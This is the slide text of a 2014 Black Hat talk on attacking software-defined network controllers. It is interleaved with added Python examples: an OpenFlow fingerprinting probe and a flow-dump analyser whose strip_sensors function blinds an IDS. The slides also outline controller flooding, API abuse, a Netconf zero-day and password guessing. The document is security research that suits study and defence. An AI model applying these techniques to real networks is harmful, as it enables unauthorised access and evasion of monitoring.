
Black hat Europe 2014, Amsterdam

Abusing Software Defined Networks

Gregory Pickett, CISSP, GCIA, GPEN
Chicago, Illinois


Hellfire Security

Overview

What is it?
Exploiting it!
Fixing it!
Moving Forward
Wrapping Up

Modern Day Networks

Vendor Dependent
Difficult to Scale
Complex and Prone to Break
Distributed and Often Inconsistent Configuration
Uses inflexible and difficult-to-innovate protocols
Unable to Consider Other Factors

… And Good Luck If You Want To Change It!

Enter … Software Defined Networking

Separate the Control and Data Plane
Forwarding Decisions Made By a Controller
Switches and Routers Just Forward Packets

Controllers
  Programmed with the Intelligence
  Full visibility of the Network
  Can consider the totality of the network before making any decision
  Enforce Granular Policy

Enter … Software Defined Networking

Switches
  Bare-Metal Only
  Any Vendor … Hardware or Software

Solves Lots of Problems

Less Expensive Hardware
With BGP
  Maintenance Dry-Out
  Customer Egress Selection
  Better BGP Security
  Faster Convergence
  Granular Peering at IXPs

Expands Our Capability

Real-World Network Slicing of Flow Space
Network and Server Load Balancing
Security
  Dynamic Access Control
  Adaptive Traffic Monitoring
  Attack Detection and Mitigation

Emerging Standards

Old and Busted
  SNMP
  BGP
  Netconf
  LISP
  PCEP

New Hotness
  OVSDB
  Openflow

Introducing Openflow

Establishes Elements
  Controller
  Secure Channel
  Forwarding Element

Defines …
  Forwarding Process
  Messaging Format

Introducing Openflow

Forwarding Process
  Check Flow Table
  If Match Found, Execute Action
  If No Match, Send Packet to Controller
  Update Flow Table

Flow Tables
  Match/Action Entries
  12 fields available for matching
  Wildcard matching available
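The two slides above describe the whole OpenFlow 1.0 data path: a priority-ordered table of match/action entries over twelve header fields, wildcards for the fields an entry does not care about, and a table miss that punts the packet to the controller, which then installs a new entry. The following is an added example written for this page (it is not code from the talk or its toolkit) that models that process in Python; the twelve field names are the OpenFlow 1.0 ofp_match fields, while the sample policy (admin 10.0.0.1, server 10.0.0.10 on switch port 4, IDS on port 9) and the packets are constructed for illustration.

```python
"""Toy model of the OpenFlow 1.0 forwarding process from the slide above.

Added example, not code from the talk or its toolkit. The twelve match
fields and the table-miss-to-controller behaviour are from the OpenFlow 1.0
spec; the sample flow entries and packets are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# The 12 OpenFlow 1.0 ofp_match fields. A field absent from an entry's match is wildcarded.
MATCH_FIELDS = (
    "in_port", "dl_src", "dl_dst", "dl_vlan", "dl_vlan_pcp", "dl_type",
    "nw_tos", "nw_proto", "nw_src", "nw_dst", "tp_src", "tp_dst",
)
Action = Tuple[str, object]   # ("output", port) | ("drop", None) | ("controller", None)


@dataclass
class FlowEntry:
    priority: int
    match: Dict[str, object]
    actions: List[Action]
    packet_count: int = 0

    def matches(self, pkt: Dict[str, object]) -> bool:
        # Every specified field must equal the packet's value; wildcards match anything.
        return all(pkt.get(k) == v for k, v in self.match.items())


class FlowTable:
    def __init__(self) -> None:
        self.entries: List[FlowEntry] = []
        self.packet_ins: List[Dict[str, object]] = []   # what was punted to the controller

    def add(self, entry: FlowEntry) -> None:
        unknown = set(entry.match) - set(MATCH_FIELDS)
        if unknown:
            raise ValueError(f"not OpenFlow 1.0 match fields: {sorted(unknown)}")
        self.entries.append(entry)
        # Highest priority wins; sort is stable so equal priorities keep insertion order.
        self.entries.sort(key=lambda e: -e.priority)

    def forward(self, pkt: Dict[str, object]) -> List[Action]:
        for e in self.entries:
            if e.matches(pkt):
                e.packet_count += 1
                return e.actions
        # Table miss: the switch cannot decide, so the packet goes to the controller.
        # Every miss is a round trip to the central controller, which is the
        # dependency a controller flood (cf. of-flood.py) sets out to exhaust.
        self.packet_ins.append(pkt)
        return [("controller", None)]


def build_sample_table() -> FlowTable:
    """Constructed policy: admin 10.0.0.1, server 10.0.0.10 on port 4, IDS on port 9."""
    t = FlowTable()
    # 300: the admin host reaches the server on any port (beats the SSH deny below).
    t.add(FlowEntry(300, {"dl_type": 0x0800, "nw_src": "10.0.0.1", "nw_dst": "10.0.0.10"},
                    [("output", 4)]))
    # 200: everyone else is denied SSH to the server; nw_src and in_port are wildcarded.
    t.add(FlowEntry(200, {"dl_type": 0x0800, "nw_proto": 6, "nw_dst": "10.0.0.10", "tp_dst": 22},
                    [("drop", None)]))
    # 50: web traffic is delivered to the server and a copy goes to the IDS.
    t.add(FlowEntry(50, {"dl_type": 0x0800, "nw_proto": 6, "nw_dst": "10.0.0.10", "tp_dst": 80},
                    [("output", 4), ("output", 9)]))
    return t


def controller_on_packet_in(table: FlowTable, pkt: Dict[str, object]) -> None:
    """Reactive controller stand-in: install an exact-match entry so the next packet is switched locally."""
    exact = {k: pkt[k] for k in MATCH_FIELDS if k in pkt}
    table.add(FlowEntry(10, exact, [("output", 4)]))


def run_demo() -> Dict[str, List[Action]]:
    t = build_sample_table()
    ip = {"dl_type": 0x0800, "nw_proto": 6, "nw_dst": "10.0.0.10"}
    admin_ssh = {**ip, "in_port": 1, "nw_src": "10.0.0.1", "tp_dst": 22}
    user_ssh = {**ip, "in_port": 2, "nw_src": "10.0.0.2", "tp_dst": 22}
    user_web = {**ip, "in_port": 2, "nw_src": "10.0.0.2", "tp_dst": 80}
    arp = {"in_port": 3, "dl_type": 0x0806}            # nothing installed for ARP
    results = {
        "admin_ssh": t.forward(admin_ssh),
        "user_ssh": t.forward(user_ssh),
        "user_web": t.forward(user_web),
        "arp_first": t.forward(arp),                   # table miss -> controller
    }
    if t.packet_ins:
        controller_on_packet_in(t, t.packet_ins[-1])   # controller updates the flow table
    results["arp_second"] = t.forward(arp)             # now matched by the switch itself
    return results


if __name__ == "__main__":
    for name, actions in run_demo().items():
        print(f"{name:12s} -> {actions}")
```

The priority ordering is what makes the admin's SSH session succeed while a user's is dropped by the same table, and the ARP packet shows the miss-then-install cycle the slide calls "Update Flow Table". Note that the IDS only sees port-80 traffic because a flow entry says so; an attacker who can edit that entry can remove the second output and the sensor goes blind, which is the point the later slides make.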

Introducing Openflow

Leading Platforms

Proprietary
  Cisco Application Policy Infrastructure Controller (APIC)
  Cisco Extensible Network Controller (XNC)
  HP Virtual Application Networks (VAN) SDN Controller
  IBM Programmable Network Controller

Open-Source
  Nox/Pox
  Ryu
  Floodlight
  Opendaylight

Floodlight

Open-Source Java Controller
Primarily an Openflow-based controller
Supports Openflow v1.0.0
Fork from the Beacon Java Openflow controller
Maintained by Big Switch Networks

Opendaylight

Open-Source Java Controller
Many southbound options including Openflow
Supports Openflow v1.0.0 and v1.3.0
Fork from the Beacon Java Openflow controller
A Linux Foundation Collaborative Project
Supported by Citrix, Red Hat, Ericsson, Hewlett Packard, Brocade, Cisco, Juniper, Microsoft, and IBM

So It’s Gonna Be All …

Not Exactly!

Protocol Weaknesses

Encryption and Authentication via TLS
More of a suggestion than a requirement though …

Started Out Good
Heading Backwards
  v1.0.0 over TLS
  v1.4.0 over TCP or TLS

Protocol Weaknesses

Controllers
  Floodlight … Nope
  Opendaylight … Supported but not required

Switches
  Arista … No
  Brocade … Surprisingly, Yes
  Cisco … Another Yes
  Dell … No
  Extreme … Another Yes
  HP … No

Protocol Weaknesses

Switches
  Huawei … No
  IBM … No
  Juniper … No
  NEC … Another Yes
  Netgear … No
  Pronto … Yes
  OVS … No

Could Lead To …

Information Disclosure through Interception
Modification through Man-in-the-Middle
And all sorts of DoS Nastiness!

DoS Nastiness

Openflow
  Centralization Entails Dependency
  Dependency Can Be Exploited
  How are vendors handling it?

Floodlight
  Explored by Solomon, Francis, and Eitan
  Their Results … Handling It Poorly

Opendaylight
  Unknown but worth investigating
  It is Java, for God's sake!

Tools

of-switch.py
  Impersonates an Openflow switch
  Utilizes Openflow v1.0.0

of-flood.py
  Floods an Openflow controller
  Disrupting the network and bringing it down
  Utilizes Openflow v1.0.0

Debug Ports

No Encryption
No Authentication
Just Full Control of the Switch
All Via the "dpctl" command-line tool
Not a problem yet …
But Soon Will Be!

Controller Weaknesses

Floodlight
  No Encryption for Northbound HTTP API
  No Authentication for Northbound HTTP API

Opendaylight
  Encryption for Northbound HTTP API
    Turned Off by Default
  Authentication for Northbound HTTP API
    HTTP Basic Authentication
    Default Password Weak
    Strong Passwords Turned Off by Default

Could Lead To …

Information Disclosure through Interception
  Topology
  Credentials

Information Disclosure through Unauthorized Access
  Topology
  Targets

And …

Topology, Flow, and Message Modification through Unauthorized Access
  Add Access
  Remove Access
  Hide Traffic
  Change Traffic

Identifying Controllers and Switches

Currently Listening on TCP Port 6633
New Port Defined … TCP Port 6653
Hellos Exchanged
Features Request
  Controller will send
  Switch will not
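The fingerprint on the slide is simple: every OpenFlow message starts with the same 8-byte header (version, type, length, xid), both sides open with HELLO, and only a controller follows its HELLO with a FEATURES_REQUEST; a switch sends HELLO and then waits to be asked. The following is an added example in the spirit of of-check.py and of-enum.py, written for this page rather than taken from the talk's toolkit. The header layout, message type numbers and version byte values are those of the OpenFlow specifications; the byte streams used to exercise it are constructed samples, and the `probe` function is the live variant that needs a reachable target (it is not run here).

```python
"""Fingerprint an OpenFlow endpoint from the messages it volunteers after HELLO.

Added example in the spirit of of-check.py / of-enum.py, not the talk's own
tools. Header layout, message types and version bytes are from the OpenFlow
specifications; the byte streams below are constructed samples.
"""
import socket
import struct
from typing import Dict, List, Tuple

OFP_HEADER = struct.Struct("!BBHI")   # version, type, length, xid: common to every OF version
OFPT_HELLO, OFPT_ERROR = 0, 1
OFPT_FEATURES_REQUEST, OFPT_FEATURES_REPLY = 5, 6
OFP_PORTS = (6633, 6653)              # the legacy port and the IANA-assigned one
VERSION_NAME = {0x01: "1.0", 0x02: "1.1", 0x03: "1.2", 0x04: "1.3", 0x05: "1.4"}


def ofp_message(version: int, msg_type: int, xid: int, payload: bytes = b"") -> bytes:
    return OFP_HEADER.pack(version, msg_type, OFP_HEADER.size + len(payload), xid) + payload


def parse_messages(data: bytes) -> List[Tuple[int, int, int]]:
    """Split a byte stream into (version, type, xid); stop at anything malformed or incomplete."""
    msgs, off = [], 0
    while off + OFP_HEADER.size <= len(data):
        version, msg_type, length, xid = OFP_HEADER.unpack_from(data, off)
        if length < OFP_HEADER.size or off + length > len(data):
            break          # never let the peer's length field walk us past the buffer
        msgs.append((version, msg_type, xid))
        off += length
    return msgs


def classify(msgs: List[Tuple[int, int, int]]) -> Dict[str, object]:
    """A controller follows its HELLO with FEATURES_REQUEST; a switch sends HELLO and waits for ours."""
    types = [t for _, t, _ in msgs]
    if OFPT_HELLO not in types:
        return {"openflow": False, "version": None, "role": None}
    hello_version = msgs[types.index(OFPT_HELLO)][0]
    if OFPT_FEATURES_REQUEST in types:
        role = "controller"
    elif OFPT_FEATURES_REPLY in types:
        role = "switch"        # it answered a FEATURES_REQUEST that we sent
    else:
        role = "switch (hello only; confirm with a FEATURES_REQUEST)"
    return {"openflow": True,
            "version": VERSION_NAME.get(hello_version, hex(hello_version)),
            "role": role}


def _drain(sock: socket.socket) -> bytes:
    buf = b""
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    except socket.timeout:
        pass
    return buf


def probe(host: str, port: int = 6633, timeout: float = 3.0) -> Dict[str, object]:
    """Live check (needs a network; not exercised offline): say HELLO as OF 1.0, see what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(ofp_message(0x01, OFPT_HELLO, 1))
        data = _drain(s)
        if OFPT_FEATURES_REQUEST not in [t for _, t, _ in parse_messages(data)]:
            # Quiet peer: behave as the controller and ask for its features.
            s.sendall(ofp_message(0x01, OFPT_FEATURES_REQUEST, 2))
            data += _drain(s)
    return classify(parse_messages(data))


# Constructed samples of what each side volunteers after our HELLO.
CONTROLLER_STREAM = ofp_message(0x01, OFPT_HELLO, 0) + ofp_message(0x01, OFPT_FEATURES_REQUEST, 1)
# An OF 1.3 switch: HELLO carrying a version-bitmap element (type 1, len 8, bit 4 = 1.3), then silence.
SWITCH_STREAM = ofp_message(0x04, OFPT_HELLO, 7, b"\x00\x01\x00\x08\x00\x00\x00\x10")
NOT_OPENFLOW = b"HTTP/1.1 400 Bad Request\r\n\r\n"

if __name__ == "__main__":
    for label, stream in (("controller", CONTROLLER_STREAM), ("switch", SWITCH_STREAM), ("other", NOT_OPENFLOW)):
        print(label, classify(parse_messages(stream)))
```

Two practical caveats: read until the peer goes quiet before classifying, since a controller's FEATURES_REQUEST can arrive in a separate segment after its HELLO and a truncated read looks like a switch; and treat the peer's length field as untrusted, which is why the parser stops rather than seeking past the buffer. A HELLO with a version byte the peer does not support will usually draw an OFPT_ERROR instead of a FEATURES_REQUEST, so an error reply is still evidence that the port speaks OpenFlow.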

Tools

of-check.py
  Identifies Openflow Services
  Reports on their Versions
  Compatible with any version of Openflow

of-enum.py
  Enumerates Openflow Endpoints
  Reports on their Type
  Compatible with any version of Openflow

Tools

of-enum.nse
  Enumerates Openflow Endpoints
  Reports on their Type
  Compatible with any version of Openflow

Demonstration

Some Attacks

Small Local Area Network
  One Admin Host
  Two User Hosts
  One Server
  One IDS

Attacker will …
  Identify Targets
  Enumerate ACLs
  Find Sensors

Tool

of-map.py
  Downloads flows from an Openflow controller
  Uses the flows:
    To identify targets and target services
    To build ACLs
    To identify sensors
  Works with Floodlight and Opendaylight via JSON
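What of-map.py gets from the controller is the network's entire policy as data: every flow entry says which destinations are reachable, which sources are denied, and which ports receive copies of traffic. The following is an added example of that analysis, written for this page and not of-map.py itself. The flow schema it reads (one object per flow with "priority", "match" and "actions", actions written as "output=N") is an assumed, simplified layout; the exact JSON that Floodlight or OpenDaylight returns differs by version, so normalise it to this shape first. The sample dump is constructed for the talk's small LAN (admin 10.0.0.1, server 10.0.0.10 on port 4, IDS on port 9), the `fetch_flows` URL is whatever flow listing your controller exposes, and the sensor rule (a port that only ever receives copies is a sensor) is a heuristic, not something the slide states.

```python
"""Walk a controller's flow dump to find targets, the effective ACL and sensors.

Added example, not of-map.py. The flow layout below (priority / match /
actions with "output=N") is an assumed, simplified schema; adapt it to the
JSON your controller version actually returns. Sample data is constructed.
"""
import base64
import copy
import json
import urllib.request
from typing import List, Optional, Set, Tuple

PROTO = {1: "icmp", 6: "tcp", 17: "udp"}

# Constructed dump: admin 10.0.0.1, server 10.0.0.10 behind port 4, IDS listening on port 9.
SAMPLE_DUMP = json.dumps([
    {"name": "admin-to-server", "priority": 300,
     "match": {"dl_type": "0x0800", "nw_src": "10.0.0.1", "nw_dst": "10.0.0.10"},
     "actions": ["output=4"]},
    {"name": "deny-ssh", "priority": 200,
     "match": {"dl_type": "0x0800", "nw_proto": 6, "nw_dst": "10.0.0.10", "tp_dst": 22},
     "actions": []},                                  # empty action list == drop in OF 1.0
    {"name": "web-mirrored", "priority": 50,
     "match": {"dl_type": "0x0800", "nw_proto": 6, "nw_dst": "10.0.0.10", "tp_dst": 80},
     "actions": ["output=4", "output=9"]},           # server on 4, a copy to the IDS on 9
    {"name": "dns", "priority": 50,
     "match": {"dl_type": "0x0800", "nw_proto": 17, "nw_dst": "10.0.0.53", "tp_dst": 53},
     "actions": ["output=5"]},
])


def sample_flows() -> List[dict]:
    return json.loads(SAMPLE_DUMP)


def fetch_flows(url: str, basic_auth: Optional[Tuple[str, str]] = None, timeout: float = 5.0) -> List[dict]:
    """GET a flow listing over the northbound HTTP API (no auth on Floodlight, Basic auth on ODL)."""
    req = urllib.request.Request(url)
    if basic_auth:
        token = base64.b64encode(f"{basic_auth[0]}:{basic_auth[1]}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)          # assumed to already be in the layout used above


def output_ports(flow: dict) -> List[int]:
    return [int(a.split("=", 1)[1]) for a in flow["actions"] if a.startswith("output=")]


def service(match: dict) -> Tuple[str, str, str]:
    """(destination, protocol, port) with '*' for wildcarded fields."""
    proto = PROTO.get(match.get("nw_proto"), "*")
    return (match.get("nw_dst", "*"), proto, str(match.get("tp_dst", "*")))


def targets(flows: List[dict]) -> Set[Tuple[str, str, str]]:
    """Destinations the network is built to deliver to: flows that actually forward."""
    return {service(f["match"]) for f in flows if output_ports(f)}


def acl(flows: List[dict]) -> List[Tuple[int, str, str, str, str, str]]:
    """Effective ACL, highest priority first; no forwarding action means deny."""
    rows = []
    for f in flows:
        dst, proto, port = service(f["match"])
        verdict = "permit" if output_ports(f) else "deny"
        rows.append((f["priority"], f["match"].get("nw_src", "*"), dst, proto, port, verdict))
    return sorted(rows, key=lambda r: -r[0])   # stable: equal priorities keep dump order


def sensor_ports(flows: List[dict]) -> Set[int]:
    """Heuristic (assumption): a port that only ever receives a copy of traffic is a sensor."""
    sole, shared = set(), set()
    for f in flows:
        ports = output_ports(f)
        (sole if len(ports) == 1 else shared).update(ports)
    return shared - sole


def strip_sensors(flows: List[dict], sensors: Set[int]) -> List[dict]:
    """The 'hide from the IDS' edit: the same flows minus every output that feeds a sensor."""
    hidden = copy.deepcopy(flows)
    for f in hidden:
        f["actions"] = [a for a in f["actions"]
                        if not (a.startswith("output=") and int(a.split("=", 1)[1]) in sensors)]
    return hidden


if __name__ == "__main__":
    flows = sample_flows()
    print("targets:", sorted(targets(flows)))
    for row in acl(flows):
        print("acl:", row)
    print("sensors on ports:", sensor_ports(flows))
```

Everything the attacker on the next slides does follows from this read: the ACL shows the admin host is the one source allowed to SSH to the server, the target list shows what is worth attacking, and `strip_sensors` produces the flow set that of-access.py would push back to blind the IDS. Note that none of it needs a credential against Floodlight, and against OpenDaylight it needs only the Basic-auth password the earlier slide describes as weak by default.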

Demonstration

And Some More Attacks …

Small Local Area Network
  One Admin Host
  Two User Hosts
  One Server
  One IDS

Attacker will …
  Gain Access to the Server
  Isolate the Administrator
  Hide from the IDS
  And Attack the Server

Tool

of-access.py
  Modifies flows on the network through the Openflow Controller
  Adds or Removes access for hosts
  Applies transformations to their network activity
  Hides activity from sensors
  Works with Floodlight and Opendaylight via JSON

Demonstration

And Now Some Pwnage …

Sorry Linux Foundation!

Zero-Day Exploit

Opendaylight has other southbound APIs besides Openflow
  No Encryption for Southbound Netconf API
  No Authentication for Southbound Netconf API
Just Connect and Exchange Messages
  XML-RPC
  Remember Java?
Boom Goes Opendaylight
And it runs as "Root"

Demonstration

If No Exploit …

Service Not Available or They Fix It
Not to Worry
Password Guess the !!!!!!
  Default Password Weak
  Strong Passwords Turned Off
  No Account Lockout
  No SYSLOG Output

Repeat!

Attacker will …
  Identify Targets
  Enumerate ACLs
  Find Sensors
  Gain Access to the Server
  Isolate the Administrator
  Hide from the IDS
  And Attack the Server

And Pwn That Network Too!

Other Exploits Waiting to Be Found!

Floodlight
  Northbound HTTP API
  Southbound Openflow API

Opendaylight
  Northbound HTTP API
  Southbound Openflow API
  Southbound Netconf API (TCP, SSH)
  Southbound Netconf Debug Port

Other Exploits Waiting to Be Found!

Opendaylight
  JMX Access
  OSGi Console
  Lisp Flow Mapping
  ODL Internal Clustering RPC
  ODL Clustering
  Java Debug Access

Available Solutions

For Now
For the Future

For Now

Transport Layer Security
  Feasible?
  Realistic?
Hardening … Duh!
VLAN … It's the Network, Stupid!
Code Review, Anyone?

For the Future

Denial of Service (SDN Architecture)
  Network Partitioning
  Controller Clustering
  Static Flow Entries
Modification (SDN Applications)
  Traffic Counters
  Respond to Abnormalities
Verification (SDN Operations)

How Prevalent Is It Going To Be?

Gartner: 10 critical IT trends for the next five years
Major Networking Vendors Have Products or Products Planned for SDN
InformationWeek 2013 Survey
  60% felt that SDN would be part of their network within 5 Years
  43% already have plans to put it in production

Reported

While Data Centers/Clouds are the Killer App for SDN
  NIPPON EXPRESS
  FIDELITY INVESTMENTS
  VMWARE
Starting to see it moving toward the LAN
  Caltech
  CERN
And WAN
  Google, NTT, and AT&T

How It Could Go Right

Vendor Independence and ultimately lower cost
Networks that match the application and the business's needs, not the other way around
Faster Evolution of the Network
Production-Scale Simulation and Experimentation
Exchangeable Network Aspects
Dynamic and Truly Active Defenses

How It Could Go Wrong

Denial of Service
  Peer Node
  External Node
  Selectively Dropping Traffic?
MiTM
  Entire Networks
  Local Subnets or Hosts
Shadow Operations
  Darknets
  Uber Admins

Making the Difference

Traditional Means of Securing Controllers Still Apply
Security Needs to Be Part of the Discussion
Until Now … How SDN Can Help Security
But How Secure is SDN?
Analyses being Done
  But By Outsiders
  Traditional Approach and 2-D
Controllers Need A Security Reference and Audit Capability
SDN has the potential to turn the entire Internet into a cloud
Benefit would be orders of magnitude above what we see now
But there is a hole in the middle of it that could easily be filled by the likes of the NSA … or worse yet, China
Let's Not Let That Happen
And That Starts Here

Final Thoughts

Toolkit

SHA1 hash is 5de4f56de0ce24cc5b4fcd691ff4e7e910e0b80b
Updates can be found at http://www.hellfiresecurity.com/

Links
http://www.sdncentral.com/
https://www.opennetworking.org/
http://www.projectfloodlight.org/
http://www.opendaylight.org/
https://www.coursera.org/course/sdn
https://www.baycollege.edu/Academics/Areas-of-Study/Computer-Network-Systems/Faculty/Linderoth/2013-sdn-survey-growing-pains.aspx
http://h17007.www1.hp.com/docs/reports/2013-Infonetics-Enterprise-SDNs-07-10-13.pdf
http://www.openflowhub.org/blog/blog/2012/12/03/sdn-use-case-multipath-tcp-at-caltech-and-cern/
http://www.networkworld.com/article/2167166/cloud-computing/vmware--we-re-building-one-of-the-biggest-sdn-deployments-in-the-industry.html
http://www.networkcomputing.com/networking/inside-googles-software-defined-network/a/d-id/1234201?
http://cseweb.ucsd.edu/~vahdat/papers/b4-sigcomm13.pdf
http://viodi.com/2014/03/15/ntt-com-leads-all-network-providers-in-deployment-of-sdnopenflow-nfv-coming-soon/